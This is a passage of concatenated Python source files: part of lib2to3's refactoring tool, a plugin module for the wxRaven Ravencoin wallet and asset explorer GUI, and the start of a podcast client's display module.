"""Traverse an AST, applying a set of fixers to each node.
This is a helper method for refactor_tree().
Args:
fixers: a list of fixer instances.
traversal: a generator that yields AST nodes.
Returns:
None
"""
if not fixers:
return
for node in traversal:
for fixer in fixers[node.type]:
results = fixer.match(node)
if results:
new = fixer.transform(node, results)
if new is not None:
node.replace(new)
node = new
def processed_file(self, new_text, filename, old_text=None, write=False,
encoding=None):
"""
Called when a file has been refactored and there may be changes.
"""
self.files.append(filename)
if old_text is None:
old_text = self._read_python_source(filename)[0]
if old_text is None:
return
equal = old_text == new_text
self.print_output(old_text, new_text, filename, equal)
if equal:
self.log_debug("No changes to %s", filename)
if not self.write_unchanged_files:
return
if write:
self.write_file(new_text, filename, old_text, encoding)
else:
self.log_debug("Not writing changes to %s", filename)
def write_file(self, new_text, filename, old_text, encoding=None):
"""Writes a string to a file.
It first shows a unified diff between the old text and the new text, and
then rewrites the file; the latter is only done if the write option is
set.
"""
try:
fp = io.open(filename, "w", encoding=encoding, newline='')
except OSError as err:
self.log_error("Can't create %s: %s", filename, err)
return
with fp:
try:
fp.write(new_text)
except OSError as err:
self.log_error("Can't write %s: %s", filename, err)
self.log_debug("Wrote changes to %s", filename)
self.wrote = True
PS1 = ">>> "
PS2 = "... "
def refactor_docstring(self, input, filename):
"""Refactors a docstring, looking for doctests.
This returns a modified version of the input string. It looks
for doctests, which start with a ">>>" prompt, and may be
continued with "..." prompts, as long as the "..." is indented
the same as the ">>>".
(Unfortunately we can't use the doctest module's parser,
since, like most parsers, it is not geared towards preserving
the original source.)
"""
result = []
block = None
block_lineno = None
indent = None
lineno = 0
for line in input.splitlines(keepends=True):
lineno += 1
if line.lstrip().startswith(self.PS1):
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block_lineno = lineno
block = [line]
i = line.find(self.PS1)
indent = line[:i]
elif (indent is not None and
(line.startswith(indent + self.PS2) or
line == indent + self.PS2.rstrip() + "\n")):
block.append(line)
else:
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
block = None
indent = None
result.append(line)
if block is not None:
result.extend(self.refactor_doctest(block, block_lineno,
indent, filename))
return "".join(result)
def refactor_doctest(self, block, lineno, indent, filename):
"""Refactors one doctest.
A doctest is given as a block of lines, the first of which starts
with ">>>" (possibly indented), while the remaining lines start
with "..." (identically indented).
"""
try:
tree = self.parse_block(block, lineno, indent)
except Exception as err:
if self.logger.isEnabledFor(logging.DEBUG):
for line in block:
self.log_debug("Source: %s", line.rstrip("\n"))
self.log_error("Can't parse docstring in %s line %s: %s: %s",
filename, lineno, err.__class__.__name__, err)
return block
if self.refactor_tree(tree, filename):
new = str(tree).splitlines(keepends=True)
# Undo the adjustment of the line numbers in wrap_toks() below.
clipped, new = new[:lineno-1], new[lineno-1:]
assert clipped == ["\n"] * (lineno-1), clipped
if not new[-1].endswith("\n"):
new[-1] += "\n"
block = [indent + self.PS1 + new.pop(0)]
if new:
block += [indent + self.PS2 + line for line in new]
return block
def summarize(self):
if self.wrote:
were = "were"
else:
were = "need to be"
if not self.files:
self.log_message("No files %s modified.", were)
else:
self.log_message("Files that %s modified:", were)
for file in self.files:
self.log_message(file)
if self.fixer_log:
self.log_message("Warnings/messages while refactoring:")
for message in self.fixer_log:
self.log_message(message)
if self.errors:
if len(self.errors) == 1:
self.log_message("There was 1 error:")
else:
self.log_message("There were %d errors:", len(self.errors))
for msg, args, kwds in self.errors:
self.log_message(msg, *args, **kwds)
def parse_block(self, block, lineno, indent):
"""Parses a block into a tree.
This is necessary to get correct line number / offset information
in the parser diagnostics and embedded into the parse tree.
"""
tree = self.driver.parse_tokens(self.wrap_toks(block, lineno, indent))
tree.future_features = frozenset()
return tree
def wrap_toks(self, block, lineno, indent):
"""Wraps a tokenize stream to systematically modify start/end."""
tokens = tokenize.generate_tokens(self.gen_lines(block, indent).__next__)
for type, value, (line0, col0), (line1, col1), line_text in tokens:
line0 += lineno - 1
line1 += lineno - 1
# Don't bother updating the columns; this is too complicated
# since line_text would also have to be updated and it would
# still break for tokens spanning lines. Let the user guess
# that the column numbers for doctests are relative to the
# end of the prompt string (PS1 or PS2).
yield type, value, (line0, col0), (line1, col1), line_text
def gen_lines(self, block, indent):
"""Generates lines as expected by tokenize from a list of lines.
This strips the first len(indent + self.PS1) characters off each line.
"""
prefix1 = indent + self.PS1
prefix2 = indent + self.PS2
prefix = prefix1
for line in block:
if line.startswith(prefix):
yield line[len(prefix):]
elif line == prefix.rstrip() + "\n":
yield "\n"
else:
raise AssertionError("line=%r, prefix=%r" % (line, prefix))
prefix = prefix2
while True:
yield ""
class MultiprocessingUnsupported(Exception):
pass
class MultiprocessRefactoringTool(RefactoringTool):
def __init__(self, *args, **kwargs):
super(MultiprocessRefactoringTool, self).__init__(*args, **kwargs)
self.queue = None
self.output_lock = None
def refactor(self, items, write=False, doctests_only=False,
num_processes=1):
if num_processes == 1:
return super(MultiprocessRefactoringTool, self).refactor(
items, write, doctests_only)
try:
import multiprocessing
except ImportError:
raise MultiprocessingUnsupported
if self.queue is not None:
raise RuntimeError("already doing multiple processes")
self.queue = multiprocessing.JoinableQueue()
self.output_lock = multiprocessing.Lock()
processes = [multiprocessing.Process(target=self._child)
for i in range(num_processes)]
try:
for p in processes:
p.start()
super(MultiprocessRefactoringTool, self).refactor(items, write,
doctests_only)
finally:
self.queue.join()
for i in range(num_processes):
self.queue.put(None)
for p in processes:
if p.is_alive():
p.join()
self.queue = None
def _child(self):
task = self.queue.get()
while task is not None:
args, kwargs = task
try:
super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
finally:
self.queue.task_done()
task = self.queue.get()
def refactor_file(self, *args, **kwargs):
if self.queue is not None:
self.queue.put((args, kwargs))
else:
return super(MultiprocessRefactoringTool, self).refactor_file(
*args, **kwargs)
|
plugin.py
|
'''
Created on 18 déc. 2021
@author: slinux
This file contains the main class to define the plugin
Each plugin must have a plugin.py file which declare a class wxRavenPlugin(PluginObject)
'''
import webbrowser
#import the class form above level, it contains predefined functions to overwrite.
#from plugins.pluginObjectTemplate import *
from wxRavenGUI.application.pluginsframework import *
#import the design of your plugin made in FormBuilder
from .wxRavenRavencoreAssetExplorerLogic import *
#import the logic of your plugin (inherit design class with logic)
from .wxRavenRavencoreDesign import *
#from .wxRavenRavencore_NetworkInfosLogic import *
from .pluginSettings import *
from .wxRavenRavencore_TransactionsViewer_Logic import *
from .wxRavenRavencore_UTXOManagerLogic import *
from .wxRaven_Ravencore_AssetOwnerExporterLogic import *
from .wxRavenRavencore_AddressViewer_Logic import *
#import the plugin setting panels, from another file to be more simple
#from .pluginSettings import MyTutorialSettingPanel_WithLogic
import json
#used for long datas requests
import threading
from .wxRavenRavencoreAssetNavigatorLogic import *
from .wxRavenRavencoreAssetIssuerLogic import *
from wxRavenGUI.application.wxcustom import *
from plugins.Ravencore.jobs import *
'''
from plugins.Ravencore.jobs.AddressViewer_AddressUTXOJob import Job_AddressUTXO
from plugins.Ravencore.jobs.AssetNavigator_AssetOwnerJob import Job_AssetNavigator_AssetOwner
from plugins.Ravencore.jobs.AssetNavigator_NavigateAssetJob import Job_AssetNavigator_Explore
from plugins.Ravencore.jobs.AssetSearch_SeachJob import Job_AssetNavigator_Search
from plugins.Ravencore.jobs.TransactionViewer_DecodeJob import Job_DecodeTx
from plugins.Ravencore.jobs.UTXOManager_TransactionHistory import Job_WalletHistory
from plugins.Ravencore.jobs.UTXOManager_WalletUTXOJob import Job_WalletUTXO
'''
try:
import pyperclip
except ImportError:
from libs import pyperclip
from datetime import datetime
import inspect
from .jobs import *
class wxRavenPlugin(PluginObject):
'''
classdocs
'''
def __init__(self, parentFrame, position="mgr"):
#Call the parent class with ParentFrame and Position
#This object is the plugin instance and will manage all views internally.
PluginObject.__init__(self, parentFrame, position=position)
#
#ParentFrame is used to refer to the main app
#Position is used to refer to the defaut position views are open.
#
#Define your plugin meta-datas :
#
# Name : Name of the plugin, It match the Plugin Folder name (not verified in other cases)
# Icon
# Views : All the views that contains the plugin
self.PLUGIN_NAME = "Ravencore"
self.PLUGIN_ICON = self.RessourcesProvider.GetImage('ravencoin') #wx.Bitmap( u"res/default_style/normal/help_view.png", wx.BITMAP_TYPE_ANY )
_iconOwnerlist = self.RessourcesProvider.GetImage('ownerlist')
#
# View Object declare all the 'Views' that can be instanciated
# {
# 'viewid': a unique id for the view
# 'name': a name for the view
# 'title': a title id for the view
# 'position':,
# 'icon':
# 'class':
# 'default': Boolean to determine if the view is open by default at startup
# 'multipleViewAllowed': Boolean to determine if the view allow multiple instance of it
#}
#
self.PLUGINS_VIEWS= [
{
'viewid':'Asset Search',
'name':'Asset Search',
'title':'Asset Search',
'position':position,
'icon':self.RessourcesProvider.GetImage('search_ravencoin'),
'class': RavencoreAssetExplorer ,
'default':False,
'multipleViewAllowed':True
} ,
{
'viewid':'Asset Navigator',
'name':'Asset Navigator',
'title':'Asset Navigator',
'position':position,
'icon':self.RessourcesProvider.GetImage('asset_navigation'),
'class': RavencoreAssetNavigator ,
'default':False,
'multipleViewAllowed':True
} ,
{
'viewid':'Asset Issuer',
'name':'Asset Issuer',
'title':'Asset Issuer',
'position':position,
'icon':self.RessourcesProvider.GetImage('asset_new'),
'class': RavencoreAssetIssuerDialog ,
'default':False,
'multipleViewAllowed':False,
'skip_save': True,
},
{
'viewid':'Wallet',
'name':'Wallet',
'title':'Wallet',
'position':'main',
'icon':self.RessourcesProvider.GetImage('wallet'),
'class': wxRavenRavencore_UTXOManagerLogic ,
'default':False,
'multipleViewAllowed':True,
},
{
'viewid':'Transactions Viewer',
'name':'Transactions Viewer',
'title':'Transactions Viewer',
'position':'main',
'icon':self.RessourcesProvider.GetImage('inspect_file'),
'class': wxRavenP2PMarket_RavencoreTxViewerWithLogic ,
'default':False,
'multipleViewAllowed':True,
'skip_save': True,
},
{
'viewid':'Address Viewer',
'name':'Address Viewer',
'title':'Address Viewer',
'position':'main',
'icon':self.RessourcesProvider.GetImage('inspect_address'),
'class': wxRaven_Ravencore_AddressViewerLogic ,
'default':False,
'multipleViewAllowed':True,
},
{
'viewid':'Asset Owner Exporter',
'name':'Asset Owner Exporter',
'title':'Asset Owner Exporter',
'position':'dialog',
'icon':_iconOwnerlist,
'class': wxRaven_Ravencore_AssetOwnerExporterLogic ,
'default':False,
'multipleViewAllowed':False,
'skip_save': True,
'toolbar_shortcut': False,
'hidden_view': True,
},
]
"""
{
'viewid':"Network Infos",
'name':"Network Infos",
'title':"Network Infos",
'position':position,
'icon':self.RessourcesProvider.GetImage('connexion_speed_2'),
'class': wxRavenRavencore_NetInfosLogic ,
'default':False,
'multipleViewAllowed':False,
'toolbar_shortcut': False
},
,
{
'viewid':'Asset Issuer',
'name':'Asset Issuer',
'title':'Asset Issuer',
'position':position,
'icon':self.RessourcesProvider.GetImage('asset'),
'class': RavencoreAssetIssuerDialog ,
'default':False,
'multipleViewAllowed':False
}
"""
#
# Setting Object declare all the 'default settings'
# Once the plugin loaded for the first time, those settings will be saved
# in the config.ini file in a dedicated section when app close.
#
# On next plugin load, if the config file contains plugins settings
# those will be overwritten in the _LoadPluginSettings() function
#
# you need to declare your own function as later in the file to CAST datas
# that come from the ConfigParser in String only
#
# {
# 'key': value
# }
#
self.PLUGIN_SETTINGS = {
'assetsearchlimit' : 50,
'strictname' : False,
'filtertype' : False,
'filtertypelist' : [],
'ipfsgateway_default' : 'https://wxraven.link/ipfs/',
'ipfsgateway_providers':['https://wxraven.link/ipfs/','https://wxraven.link/ipfs2/','https://ipfs.cryptide.ca/ipfs/','https://gateway.ravenclause.com/ipfs/', 'https://cloudflare-ipfs.com/ipfs/', 'https://ravencoinipfs-gateway.com/ipfs/'],
'bookmark_list':['My Assets'],
'navigation_use_cache' : True,
'tree_display_regroupby_main':False,
'tree_display_virtual_sort':False,
}
self.registerJob(Job_AddressInspectionAdvanced)
self.registerJob(Job_AddressInspection)
self.registerJob(Job_AddressUTXO)
self.registerJob(Job_AssetNavigator_AssetOwner)
self.registerJob(Job_AssetNavigator_Explore)
self.registerJob(Job_AssetNavigator_Search)
self.registerJob(Job_DecodeTx)
self.registerJob(Job_WalletHistory)
self.registerJob(Job_WalletUTXO)
#
# Lets put some setting pannels from pluginsetting file (to define as well)
#
"""
self.PLUGIN_SETTINGS_GUI = []
_prefIcon = self.RessourcesProvider.GetImage('wizard-prefs')
_MyTutorialSettingPanel_WithLogic = PluginSettingsTreeObject("Tutorial", _prefIcon, classPanel=MyTutorialSettingPanel_WithLogic, _childs=None)
self.PLUGIN_SETTINGS_GUI.append(_MyTutorialSettingPanel_WithLogic)
"""
self.PLUGIN_SETTINGS_GUI.clear()
_Icon = self.RessourcesProvider.GetImage('ravencoin')
_generalPannel = PluginSettingsTreeObject("Ravencore", _Icon, classPanel=wxRavencore_GeneralSettings_WithLogic, _childs=None)
_Icon = self.RessourcesProvider.GetImage('bookmarks_view')
_bmrkPannel = PluginSettingsTreeObject("Bookmarks", _Icon, classPanel=wxRavencore_BookmarksSettings_WithLogic, _childs=None)
_Icon = self.RessourcesProvider.GetImage('raven_ipfs')
_ipfsPannel = PluginSettingsTreeObject("IPFS Gateway", _Icon, classPanel=wxRavencore_IPFSSettings_WithLogic, _childs=None)
#wxRavencore_IPFSSettings_WithLogic
_generalPannel._childs.append(_ipfsPannel)
_generalPannel._childs.append(_bmrkPannel)
self.PLUGIN_SETTINGS_GUI.append(_generalPannel)
#self.PLUGIN_SETTINGS_GUI.append(_bmrkPannel)
#
# Datas : In order to avoid each view to individually request the same data through RPC,
# the plugin can contains Global vars / datas shared to the views
# it also allow to request those big datas through thread and call update after
#
#self.setData("myPluginData", {})
#self.setData("myPluginData2", False)
self.setData("_LastSearch", "")
self.setData("_AssetSearchResult", {})
self.setData('_AssetOwnerList', {})
self.setData("_AssetLibraryList", {'My Assets':None})
self.setData("_CurrentLibrary", 'My Assets')
self.setData("_AllUTXOs", {'RVN':[], 'ASSETS':[]})
self.setData("_AllUTXOs_running", False)
self.setData("_tx_history", {})
self.setData("_tx_history_category", '')
self.setData("_tx_history_start", None)
self.setData("_tx_history_stop", None)
self.setData("_tx_history_address_filter", [])
self.setData("_utxo_manager_views_addons_callbacks", [])
self.setData("_last_tx_decoded", None)
self.setData("_address_viewer_running", False)
self.setData("_address_viewer_current_address_text", '')
self.setData("_address_viewer_advanced_mode", False)
self.setData("_address_viewer_check_inputs", False)
self.setData("_address_viewer_check_iterations", 1)
self.setData("_address_viewer_datas_utxo", {})
self.setData("_address_viewer_datas_tx_history", {})
#
# Plugin can Register on callbacks like Connexion change in this case, it will start a thread to get datas
#
self.parentFrame.ConnexionManager.RegisterOnConnexionChanged(self.OnNetworkChanged_T)
#
# Finally, this last line is MANDATORY to load the default views.
#
#self.LoadPluginFrames()
"""
Plugins setting management
Note, this method must be overwritten on plugins that use settings since
config parser only use STRING values.
"""
def _LoadPluginSettings(self):
_recordedSettings = self.parentFrame.Settings._GetPluginSettings(self.PLUGIN_NAME)
for key in _recordedSettings:
#
# _recordedSettings[key] Return string only, do your own mapping for complex datastructure
#
self.PLUGIN_SETTINGS[key] = _recordedSettings[key]
_str = _recordedSettings[key]
try:
convertedData = json.loads(_str.replace('\'','"'))
self.PLUGIN_SETTINGS[key] = convertedData
except Exception as e:
#print("NOT json data :" + str(e))
pass
if _str == "True":
self.PLUGIN_SETTINGS[key] = True
elif _str == "False":
self.PLUGIN_SETTINGS[key] = False
self.__create__libcache__()
def __create__libcache__(self):
_AssetLibraryList = {}
_bkmrk = self.PLUGIN_SETTINGS['bookmark_list']
for _bookmark in _bkmrk:
_AssetLibraryList[_bookmark] = None
self.setData("_AssetLibraryList", _AssetLibraryList)
'''
Plugin Triggers / Callbacks for data update , DO NOT CALL WX UPDATE OUT OUF wx.CallAfter(cb, param)
'''
def OnSearchRequested_T(self, keyword="", limit=50, onlyMain=False, callback=None, openViewAfter=False):
#t=threading.Thread(target=self.OnUpdatePluginDatas_SEARCH, args=(keyword,limit, onlyMain))
#t.start()
#Job_AssetNavigator_Explore
j = Job_AssetNavigator_Search(self, keyword=keyword,limit=limit,onlyMain=onlyMain, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
if openViewAfter:
_newView = self.parentFrame.Views.OpenView("Asset Search", "Ravencore", True)
print(_newView)
if _newView != None:
self.parentFrame.Views.OpenView("Asset Search", "Ravencore", False)
#_vi = self.parentFrame.Views.SearchViewInstance("Asset Search")
#_vi['instance'].Show()
#self.parentFrame.Views.
def OnNetworkChanged_T(self, networkName=""):
#t=threading.Thread(target=self.OnUpdatePluginDatas)
#t.start()
#wx.CallAfter(self.UpdateActiveViews, ())
#pass
if not self.parentFrame._isReady:
return None
#self.OnUTXORequested_T()
def OnUpdatePluginDatas_SEARCH(self, keyword="", limit=50, onlyMain=False):
print('OnUpdatePluginDatas_SEARCH === SHOULD BE REPLACED')
#self.setData("myPluginData", {})
#self.setData("myPluginData2", False)
'''
_AssetSearchResult = {}
#try:
try:
#if True:
keyword = keyword.upper()
_lastSearch = self.getData("_LastSearch")
if _lastSearch == keyword:
wx.CallAfter(self.UpdateActiveViews, ())
return
if keyword == "":
keyword = self.getData("_LastSearch")
_SkipChars = []
if onlyMain:
_SkipChars = ['#', "/", '$']
_AssetSearchResult = self.parentFrame.getRvnRPC().asset.SearchAsset(AssetName=keyword,limit=limit,datetime=True, skipChars=_SkipChars )
#myPluginData = self.parentFrame.ConnexionManager.getAllConnexions()
#myPluginData2 = self.parentFrame.ConnexionManager.getCurrent()
self.setData("_AssetSearchResult", _AssetSearchResult)
self.setData("_LastSearch", keyword)
#self.setData("myPluginData2", myPluginData2)
#When datas are loaded, add a call after to trigger plugins view update
wx.CallAfter(self.UpdateActiveViews, ())
except Exception as e:
self.RaisePluginLog( "Unable to search asset :"+ str(e), type="error")
'''
def OnNavigateRequested_T(self, lib="", callback=None):
self.setData("_CurrentLibrary", lib)
#t=threading.Thread(target=self.OnUpdatePluginDatas_NAVIGATE, args=(library,))
#t.start()
j = Job_AssetNavigator_Explore(self,library=lib, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
def OnUpdatePluginDatas_NAVIGATE(self, library=""):
print('OnUpdatePluginDatas_HISTORY === SHOULD BE REPLACED')
'''
if library == "":
library = "My Assets"
_resultData = None
_allLibs = self.getData("_AssetLibraryList")
navigation_use_cache = self.PLUGIN_SETTINGS['navigation_use_cache']
_virtualReorganizationButtonState = self.PLUGIN_SETTINGS['tree_display_virtual_sort']
_organizeByMainAssetButtonState = self.PLUGIN_SETTINGS['tree_display_regroupby_main']
if navigation_use_cache:
if _allLibs.__contains__(library):
if _allLibs[library] != None:
wx.CallAfter(self.UpdateActiveViews, ())
return
if library == "My Assets":
_resultData = self.parentFrame.getRvnRPC().asset.ExploreWalletAsset(OrganizeByMainAsset=_organizeByMainAssetButtonState)
_allLibs[library] = _resultData
else:
_resultData = self.parentFrame.getRvnRPC().asset.ExploreAsset(library, _limit=99999, _skipchars=[])
if _virtualReorganizationButtonState:
#print("EXPERIMENTAL = TRY TO REORGANIZE DATAS")
_resultData.Reorganize_Series(regularExp="^#[a-zA-Z0-9]+" , minOccurence=1)
#print(_resultData)
_allLibs[library] = _resultData
self.setData("_AssetLibraryList", _allLibs)
#self.setData("_CurrentLibrary", library)
wx.CallAfter(self.UpdateActiveViews, ())
#self.RaisePluginLog( "Unable to explore asset '"+keyword+"' :"+ str(e), type="error")
'''
def OnHISTORYRequested_T(self,callback=None):
self.setData("_tx_history", {})
#t=threading.Thread(target=self.OnUpdatePluginDatas_HISTORY, args=())
#t.start()
j = Job_WalletHistory(self, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
def OnUpdatePluginDatas_HISTORY(self, library=""):
print('OnUpdatePluginDatas_HISTORY === SHOULD BE REPLACED')
#print('OnUpdatePluginDatas_HISTORY')
'''
ravencoin = self.parentFrame.getRvnRPC()
_DatasHistory = { }
#if True:
#if True:
try:
_categorie = self.getData("_tx_history_category")
_start_date = self.getData("_tx_history_start")
_stop_date = self.getData("_tx_history_stop")
_filter_addresses = self.getData("_tx_history_address_filter")
_DatasHistory = ravencoin.wallet.GetWalletTransactionList(categorie=_categorie, filter_addresses=_filter_addresses, start_date=_start_date, stop_date=_stop_date)
#_ListAsset = ravencoin.asset.GetAssetUnspentList(assetname='', _fullDatas=True, _includeLocked=True)
#_DatasUtxo['ASSETS'] = _ListAsset
#print(f"_DatasUtxo {_DatasUtxo['ASSETS']}")
wx.CallAfter(self.UpdateActiveViews, ())
except Exception as e:
self.RaisePluginLog( "Unable to update UTXO List : "+ str(e), type="error")
self.setData("_tx_history", _DatasHistory)
#print(f"SAVEDATA ")
'''
def OnUTXORequested_T(self, callback=None):
self.setData("_AllUTXOs", {'RVN':[], 'ASSETS':[]})
#t=threading.Thread(target=self.OnUpdatePluginDatas_UTXO, args=())
#t.start()
j = Job_WalletUTXO(self, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
def OnUpdatePluginDatas_UTXO(self, library=""):
pass
print('OnUpdatePluginDatas_UTXO === SHOULD BE REPLACED')
'''
if self.getData("_AllUTXOs_running")==True:
return
self.setData("_AllUTXOs_running", True)
print('OnUpdatePluginDatas_UTXO')
ravencoin = self.parentFrame.getRvnRPC()
_DatasUtxo = {'RVN':[],'ASSETS':[] }
#if True:
try:
_listRaw = ravencoin.wallet.GetUnspentList(_OnlySpendable=True, _ExlcudeAddresses=[],_IncludeOnlyAddresses=[], _fullDatas=True , _includeLocked=True)
_DatasUtxo = self.getData('_AllUTXOs')
_DatasUtxo['RVN'] = _listRaw
_ListAsset = ravencoin.asset.GetAssetUnspentList(assetname='', _fullDatas=True, _includeLocked=True)
_DatasUtxo['ASSETS'] = _ListAsset
#print(f"_DatasUtxo {_DatasUtxo['ASSETS']}")
wx.CallAfter(self.UpdateActiveViews, ())
except Exception as e:
self.RaisePluginLog( "Unable to update UTXO List : "+ str(e), type="error")
self.setData("_AllUTXOs_running", False)
self.setData("_AllUTXOs", _DatasUtxo)
#print(f"SAVEDATA ")
'''
#
#
#AddressScan
#
#
def OnAddressScanRequest_T(self):
print(str(inspect.stack()[0][0].f_code.co_name))
print(str(inspect.stack()[1][0].f_code.co_name))
#print(str(inspect.stack()[2][0].f_code.co_name))
print('OnAddressScanRequest_T === SHOULD BE REPLACED')
#self.OnAddressUTXORequested_T()
#self.OnAddressHISTORYRequested_T()
def OnAddressUTXORequested_T(self, callback=None):
self.setData("_address_viewer_datas_utxo", {'RVN':[],'ASSETS':[] })
j = Job_AddressUTXO(self, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
#t=threading.Thread(target=self.OnUpdatePluginAddressDatas_UTXO, args=())
#t.start()
#
# Replaced by a JOB
#
def OnUpdatePluginAddressDatas_UTXO(self, library=""):
pass
print('OnUpdatePluginAddressDatas_UTXO === SHOULD BE REPLACED')
'''
_add = self.getData('_address_viewer_current_address_text')
print(f'OnUpdatePluginAddressDatas_UTXO {_add}')
ravencoin = self.parentFrame.getRvnRPC()
_DatasUtxo = {'RVN':[],'ASSETS':[] }
if True:
#try:
if _add == "":
return
_addressList = _add.split(',')
_listRaw = ravencoin.directories.GetAddressUnspentList( _addressList, asset="RVN", _excludeAsset='')
_DatasUtxo = self.getData('_address_viewer_datas_utxo')
_DatasUtxo['RVN'] = _listRaw
_ListAsset = ravencoin.directories.GetAddressUnspentList(_addressList, asset='*', _excludeAsset='RVN')
_DatasUtxo['ASSETS'] = _ListAsset
#print(f"_DatasUtxo {_DatasUtxo['ASSETS']}")
wx.CallAfter(self.UpdateActiveViews, ())
#except Exception as e:
# self.RaisePluginLog( "Unable to update address UTXO List : "+ str(e), type="error")
self.setData("_address_viewer_datas_utxo", _DatasUtxo)
'''
def OnAddressHISTORYRequested_T(self, callback=None):
self.setData("_address_viewer_datas_tx_history", {})
j = Job_AddressInspection(self, viewCallback=callback, safeMode=True)
self.parentFrame.NewJob(j)
#self.setData("_address_viewer_datas_tx_history", {})
#t=threading.Thread(target=self.OnUpdatePluginAddressDatas_HISTORY, args=())
#t.start()
#
# Replaced by a JOB
#
def OnUpdatePluginAddressDatas_HISTORY(self, library=""):
pass
print('OnUpdatePluginAddressDatas_UTXO === SHOULD BE REPLACED')
'''
if self.getData("_address_viewer_running") ==True:
return
print('OnUpdatePluginDatas_HISTORY')
_add = self.getData('_address_viewer_current_address_text')
ravencoin = self.parentFrame.getRvnRPC()
_DatasHistory = []
self.setData("_address_viewer_running", True)
#if True:
if True:
#try:
if _add == "":
return
_addressList = _add.split(',')
#_categorie = self.getData("_tx_history_category")
#_start_date = self.getData("_tx_history_start")
#_stop_date = self.getData("_tx_history_stop")
#_filter_addresses = self.getData("_tx_history_address_filter")
_DatasHistoryList = ravencoin.directories.GetAddressTransactionList(_addressList, _fullScan=False)
_cursor = 0
_max = len(_DatasHistoryList)
for _item in _DatasHistoryList:
#print(f"Inspecting Transactions ({_cursor} / {_max}0")
_txInspected = ravencoin.utils.GetAndScanRawTransaction(_item, _addressList)
_DatasHistory.append(_txInspected)
_cursor = _cursor+1
#print(_DatasHistory)
#_ListAsset = ravencoin.asset.GetAssetUnspentList(assetname='', _fullDatas=True, _includeLocked=True)
#_DatasUtxo['ASSETS'] = _ListAsset
#print(f"_DatasUtxo {_DatasUtxo['ASSETS']}")
#wx.CallAfter(self.UpdateActiveViews, ())
#except Exception as e:
# self.RaisePluginLog( "Unable to update address transaction history List : "+ str(e), type="error")
self.setData("_address_viewer_running", False)
self.setData("_address_viewer_datas_tx_history", _DatasHistory)
'''
#
# Views caller and quickwin
#
def AddAssetInBookmark(self, assetName):
currentBk = self.PLUGIN_SETTINGS['bookmark_list']
if not currentBk.__contains__(assetName):
currentBk.append(assetName)
_allLibs = self.getData("_AssetLibraryList")
_allLibs[assetName] = None
self.setData("_AssetLibraryList", _allLibs)
self.PLUGIN_SETTINGS['bookmark_list'] = currentBk
wx.CallAfter(self.UpdateActiveViews, ())
def NaviguateAsset(self, assetName):
print("Plugin navigation requested:"+str(assetName))
self.OnNavigateRequested_T(assetName)
vcount = 0
_views = []
_navViewDatas = {}
for r in self.VIEWS_INSTANCES:
rView = r['instance']
vName = r['viewid']
if vName == "Asset Navigator":
rView.ShowLoading()
vcount = vcount+1
_views.append(rView)
if vcount ==0:
_newView = self.LoadView(self.SearchPluginView("Asset Navigator"), "main")
_newView.ShowLoading()
#_allLibs = self.getData("_AssetLibraryList")
def previewIPFS(self, ItemURL, openNew=False):
#wx.Log.SetActiveTarget(wx.LogStderr())
_PreviewWindow = self.getData("_PreviewWindow")
if _PreviewWindow == None or openNew:
_PreviewWindow = RavencoreHTMLViewer(self.parentFrame, ItemURL, 'mgr')
self.setData("_PreviewWindow", _PreviewWindow)
else:
_PreviewWindow.wv.LoadURL(ItemURL)
self.parentFrame.Views.ShowParentInManager(_PreviewWindow)
#self.parent_frame.Views.OpenView("Simple Wallet", pluginname='', createIfNull=True)
#self.parent_frame.m_mgr.GetPane("Asset Preview").Show()
#self.parent_frame.Views.UpdateGUIManager()
def OpeninWebBrowser(self, _url):
webbrowser.open(_url)
def OpenIPFSinWebBrowser(self, _data, provider=""):
print(_data)
_ipfsgateway_default = self.parentFrame.GetPluginSetting("Ravencore","ipfsgateway_default")
_gateway = provider
if provider == "":
_gateway = _ipfsgateway_default
#_data= self._datacache[self._currentItem]
print(_data['has_ipfs'])
if _data['has_ipfs']:
_url = _gateway +_data['ipfs_hash']
self.OpeninWebBrowser(_url)
def CopyClip(self, _data):
#itemData = self._datacache[self._currentItem]
print(_data)
if _data['has_ipfs']:
pyperclip.copy(_data['ipfs_hash'])
#self.infoMessage("IPFS Hash copied to the clipboard", wx.ICON_INFORMATION)
def OpenAssetIssuer(self, rootAsset=""):
_newView = self.LoadView(self.SearchPluginView("Asset Issuer"), "main")
if rootAsset !="":
print(">root setup requested")
_newView.setupRoot(rootAsset)
#_popupDialog = RavencoreAssetIssuerDialog(self.parentFrame)
def ExportAssetOwnerList(self, assetSearch):
_newView = self.parentFrame.Views.OpenView("Asset Owner Exporter", "Ravencore", True)
#if txdatas !="":
if True:
_v=self.parentFrame.Views.SearchDialog("Asset Owner Exporter")
if _v!=None:
print(f">ExportAssetOwnerList requested {assetSearch}")
_v._Panel.SetAssetAndStart(assetSearch)
def ShowTxInfos(self, txdatas="", openIfnotExist=True):
#_newView = self.parentFrame.Views.OpenView("Transactions Viewer", "Ravencore", openIfnotExist)
_newView = self.LoadView(self.SearchPluginView("Transactions Viewer"), "main")
if txdatas!="":
_newView.SetTxId(txdatas)
def GetUTXOManager(self, open=True):
_newView = self.parentFrame.Views.OpenView("Wallet", "Ravencore", open)
print(_newView)
if _newView == None:
_vi = self.parentFrame.Views.SearchViewInstance("Wallet")
return _vi['instance']
return _newView['instance']
def CheckIPFSGateway(self):
pass
def QuickWalletUnlockRequest(self):
ravencoin = self.parentFrame.getRvnRPC()
pwd=RequestUserWalletPassword(self.parentFrame)
if pwd != None:
res=ravencoin.wallet.__check_unlock__(_passphrase=pwd, timeout=30)
#UserAdvancedMessage(parentf, message, type, msgdetails, showCancel)
ReportRPCResult(self.parentFrame, res )
|
display.py
|
import curses
import glob
import importlib
import threading
from typing import List
from os.path import dirname, basename, isfile
import castero
from castero import helpers
from castero.config import Config
from castero.database import Database
from castero.downloadqueue import DownloadQueue
from castero.feed import Feed, FeedError, FeedLoadError, FeedDownloadError, \
FeedParseError, FeedStructureError
from castero.episode import Episode
from castero.perspective import Perspective
from castero.queue import Queue
class DisplayError(Exception):
"""An ambiguous error while handling the display.
"""
class DisplaySizeError(DisplayError):
"""The display does not have acceptable dimensions.
"""
class Display:
"""The Display class.
This class is used to handle all user-interaction. It creates and handles
